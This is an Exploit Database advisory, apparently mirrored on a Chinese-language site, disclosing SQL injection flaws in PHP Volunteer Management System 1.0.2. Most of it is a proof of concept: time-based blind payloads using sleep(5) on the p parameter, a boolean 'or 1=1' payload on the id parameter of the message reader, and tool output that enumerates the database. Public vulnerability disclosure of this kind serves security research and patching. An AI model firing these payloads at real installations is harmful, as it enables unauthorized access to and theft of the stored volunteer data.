PHP Volunteer Management System 1.0.2 – Multiple SQL Injections

• Exploit Database
• 100 阅读

• 作者： loneferret
  日期： 2012-05-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18944/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39

  # Title: PHP Volunteer Management System v 1.0.2 multiple SQLi Vulnerabilities # Version: 1.0.2 # Author/Found by: loneferret # Software Site: https://sourceforge.net/projects/phpvolunteer/ # Other vulnerabilities: http://www.exploit-db.com/exploits/18941/   # Date found: May 28th 2012 # Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23   # Vulnerability: # Due to improper sanitation, many of the parameters are injectable, # some need to be authenticated, others not.     # As always have fun...   PoC:   Page: index.php Parameter: ?p= Method: GET Payload: /?p=dashboard' and sleep(5) and '1'='1 Payload: /?p=login' and sleep(5) and '1'='1   Other affected parameters can be found in the message section of the application when reading or deleting a message.   Parameter: id= Url: /?p=read_message&id=2 Payload: /?p=read_message&id=-1' or '1'='1     Possible output: [10:00:02] [INFO] searching database 'bf102' [10:00:02] [INFO] the SQL query used returns 1 entries [10:00:02] [INFO] resumed: "bf102" found databases [1]: [*] bf102